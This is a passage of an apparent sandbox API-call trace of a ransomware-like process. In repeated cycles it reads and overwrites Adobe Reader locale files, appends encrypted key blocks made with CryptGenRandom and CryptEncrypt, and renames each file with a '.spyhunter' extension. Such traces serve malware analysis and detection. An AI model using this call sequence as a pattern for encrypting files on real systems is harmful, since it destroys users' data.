10.0\\reader\\locale\\ja_jp\\weblink.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0115.813] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Weblink.JPN") returned 76 [0115.813] StrStrW (lpFirst="Weblink.JPN", lpSrch=".txt") returned 0x0 [0115.813] GetProcessHeap () returned 0x2c0000 [0115.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0115.813] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f674, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f674*=0x2800, lpOverlapped=0x0) returned 1 [0115.962] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.962] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f674, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f674*=0x2800, lpOverlapped=0x0) returned 1 [0115.962] GetProcessHeap () returned 0x2c0000 [0115.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0115.963] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.963] WriteFile (in: hFile=0xec, lpBuffer=0x270f6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f674, lpOverlapped=0x0 | out: lpBuffer=0x270f6b4*, lpNumberOfBytesWritten=0x270f674*=0x4, lpOverlapped=0x0) returned 1 [0116.290] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f674, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f674*=0x30, lpOverlapped=0x0) returned 1 [0116.291] CloseHandle (hObject=0xec) returned 1 [0116.291] GetProcessHeap () returned 0x2c0000 [0116.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0116.291] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Weblink.JPN.spyhunter") returned 86 [0116.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Weblink.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\weblink.jpn"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Weblink.JPN.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\weblink.jpn.spyhunter")) returned 1 [0116.293] GetProcessHeap () returned 0x2c0000 [0116.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0116.293] GetProcessHeap () returned 0x2c0000 [0116.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0116.293] GetProcessHeap () returned 0x2c0000 [0116.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8d2f0 | out: hHeap=0x2c0000) returned 1 [0116.293] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6b8 | out: pbBuffer=0x270f6b8) returned 1 [0116.293] GetProcessHeap () returned 0x2c0000 [0116.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0116.293] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6b0*=0x30) returned 1 [0116.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\updater.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\updater.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0116.299] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\updater.NLD") returned 76 [0116.299] StrStrW (lpFirst="updater.NLD", lpSrch=".txt") returned 0x0 [0116.299] GetProcessHeap () returned 0x2c0000 [0116.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0116.299] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f674, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f674*=0x2800, lpOverlapped=0x0) returned 1 [0116.340] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0116.340] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f674, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f674*=0x2800, lpOverlapped=0x0) returned 1 [0116.341] GetProcessHeap () returned 0x2c0000 [0116.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0116.341] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.341] WriteFile (in: hFile=0xec, lpBuffer=0x270f6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f674, lpOverlapped=0x0 | out: lpBuffer=0x270f6b4*, lpNumberOfBytesWritten=0x270f674*=0x4, lpOverlapped=0x0) returned 1 [0116.341] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f674, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f674*=0x30, lpOverlapped=0x0) returned 1 [0116.341] CloseHandle (hObject=0xec) returned 1 [0116.341] GetProcessHeap () returned 0x2c0000 [0116.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0116.341] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\updater.NLD.spyhunter") returned 86 [0116.341] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\updater.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\updater.nld"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\updater.NLD.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\updater.nld.spyhunter")) returned 1 [0116.342] GetProcessHeap () returned 0x2c0000 [0116.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0116.342] GetProcessHeap () returned 0x2c0000 [0116.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0116.342] GetProcessHeap () returned 0x2c0000 [0116.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6b0d8 | out: hHeap=0x2c0000) returned 1 [0116.342] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6b0 | out: pbBuffer=0x270f6b0) returned 1 [0116.342] GetProcessHeap () returned 0x2c0000 [0116.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0116.343] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6a8*=0x30) returned 1 [0116.343] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Spelling.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\spelling.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0116.343] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Spelling.NLD") returned 77 [0116.343] StrStrW (lpFirst="Spelling.NLD", lpSrch=".txt") returned 0x0 [0116.343] GetProcessHeap () returned 0x2c0000 [0116.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0116.343] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f66c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f66c*=0x2800, lpOverlapped=0x0) returned 1 [0116.429] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0116.429] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f66c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f66c*=0x2800, lpOverlapped=0x0) returned 1 [0116.429] GetProcessHeap () returned 0x2c0000 [0116.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0116.430] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.430] WriteFile (in: hFile=0xec, lpBuffer=0x270f6ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f66c, lpOverlapped=0x0 | out: lpBuffer=0x270f6ac*, lpNumberOfBytesWritten=0x270f66c*=0x4, lpOverlapped=0x0) returned 1 [0116.430] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f66c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f66c*=0x30, lpOverlapped=0x0) returned 1 [0116.430] CloseHandle (hObject=0xec) returned 1 [0116.430] GetProcessHeap () returned 0x2c0000 [0116.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0116.430] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Spelling.NLD.spyhunter") returned 87 [0116.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Spelling.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\spelling.nld"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Spelling.NLD.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\spelling.nld.spyhunter")) returned 1 [0117.019] GetProcessHeap () returned 0x2c0000 [0117.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0117.019] GetProcessHeap () returned 0x2c0000 [0117.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0117.019] GetProcessHeap () returned 0x2c0000 [0117.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6aff0 | out: hHeap=0x2c0000) returned 1 [0117.021] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6a8 | out: pbBuffer=0x270f6a8) returned 1 [0117.021] GetProcessHeap () returned 0x2c0000 [0117.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0117.021] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6a0*=0x30) returned 1 [0117.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\WebLink.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\weblink.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0117.024] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\WebLink.SKY") returned 76 [0117.024] StrStrW (lpFirst="WebLink.SKY", lpSrch=".txt") returned 0x0 [0117.025] GetProcessHeap () returned 0x2c0000 [0117.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0117.025] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f664, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f664*=0x2800, lpOverlapped=0x0) returned 1 [0117.047] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.047] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f664, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f664*=0x2800, lpOverlapped=0x0) returned 1 [0117.047] GetProcessHeap () returned 0x2c0000 [0117.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0117.047] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.047] WriteFile (in: hFile=0xec, lpBuffer=0x270f6a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f664, lpOverlapped=0x0 | out: lpBuffer=0x270f6a4*, lpNumberOfBytesWritten=0x270f664*=0x4, lpOverlapped=0x0) returned 1 [0117.110] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f664, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f664*=0x30, lpOverlapped=0x0) returned 1 [0117.110] CloseHandle (hObject=0xec) returned 1 [0117.114] GetProcessHeap () returned 0x2c0000 [0117.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0117.114] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\WebLink.SKY.spyhunter") returned 86 [0117.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\WebLink.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\weblink.sky"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\WebLink.SKY.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\weblink.sky.spyhunter")) returned 1 [0117.149] GetProcessHeap () returned 0x2c0000 [0117.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0117.149] GetProcessHeap () returned 0x2c0000 [0117.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0117.149] GetProcessHeap () returned 0x2c0000 [0117.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6e568 | out: hHeap=0x2c0000) returned 1 [0117.150] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6a8 | out: pbBuffer=0x270f6a8) returned 1 [0117.150] GetProcessHeap () returned 0x2c0000 [0117.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0117.150] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6a0*=0x30) returned 1 [0117.150] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\updater.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\updater.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0117.157] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\updater.SVE") returned 76 [0117.157] StrStrW (lpFirst="updater.SVE", lpSrch=".txt") returned 0x0 [0117.157] GetProcessHeap () returned 0x2c0000 [0117.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0117.158] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f664, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f664*=0x2800, lpOverlapped=0x0) returned 1 [0117.187] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.187] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f664, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f664*=0x2800, lpOverlapped=0x0) returned 1 [0117.190] GetProcessHeap () returned 0x2c0000 [0117.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0117.190] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.191] WriteFile (in: hFile=0xb4, lpBuffer=0x270f6a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f664, lpOverlapped=0x0 | out: lpBuffer=0x270f6a4*, lpNumberOfBytesWritten=0x270f664*=0x4, lpOverlapped=0x0) returned 1 [0117.191] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f664, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f664*=0x30, lpOverlapped=0x0) returned 1 [0117.191] CloseHandle (hObject=0xb4) returned 1 [0117.191] GetProcessHeap () returned 0x2c0000 [0117.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0117.191] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\updater.SVE.spyhunter") returned 86 [0117.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\updater.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\updater.sve"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\updater.SVE.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\updater.sve.spyhunter")) returned 1 [0117.192] GetProcessHeap () returned 0x2c0000 [0117.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0117.192] GetProcessHeap () returned 0x2c0000 [0117.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0117.192] GetProcessHeap () returned 0x2c0000 [0117.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6f648 | out: hHeap=0x2c0000) returned 1 [0117.192] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6a0 | out: pbBuffer=0x270f6a0) returned 1 [0117.192] GetProcessHeap () returned 0x2c0000 [0117.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0117.192] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f698*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f698*=0x30) returned 1 [0117.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Updater.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\updater.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0117.193] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Updater.TUR") returned 76 [0117.193] StrStrW (lpFirst="Updater.TUR", lpSrch=".txt") returned 0x0 [0117.193] GetProcessHeap () returned 0x2c0000 [0117.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0117.193] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f65c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f65c*=0x2800, lpOverlapped=0x0) returned 1 [0117.207] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.207] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f65c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f65c*=0x2800, lpOverlapped=0x0) returned 1 [0117.207] GetProcessHeap () returned 0x2c0000 [0117.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0117.208] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.208] WriteFile (in: hFile=0xb4, lpBuffer=0x270f69c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f65c, lpOverlapped=0x0 | out: lpBuffer=0x270f69c*, lpNumberOfBytesWritten=0x270f65c*=0x4, lpOverlapped=0x0) returned 1 [0117.208] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f65c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f65c*=0x30, lpOverlapped=0x0) returned 1 [0117.208] CloseHandle (hObject=0xb4) returned 1 [0117.235] GetProcessHeap () returned 0x2c0000 [0117.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.236] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Updater.TUR.spyhunter") returned 86 [0117.236] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Updater.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\updater.tur"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Updater.TUR.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\updater.tur.spyhunter")) returned 1 [0117.236] GetProcessHeap () returned 0x2c0000 [0117.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.236] GetProcessHeap () returned 0x2c0000 [0117.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0117.236] GetProcessHeap () returned 0x2c0000 [0117.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e70040 | out: hHeap=0x2c0000) returned 1 [0117.238] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f698 | out: pbBuffer=0x270f698) returned 1 [0117.238] GetProcessHeap () returned 0x2c0000 [0117.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0117.238] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f690*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f690*=0x30) returned 1 [0117.238] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Weblink.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\weblink.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0117.239] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Weblink.UKR") returned 76 [0117.239] StrStrW (lpFirst="Weblink.UKR", lpSrch=".txt") returned 0x0 [0117.239] GetProcessHeap () returned 0x2c0000 [0117.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.239] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f654, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f654*=0x2800, lpOverlapped=0x0) returned 1 [0117.285] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.285] WriteFile (in: hFile=0xb4, 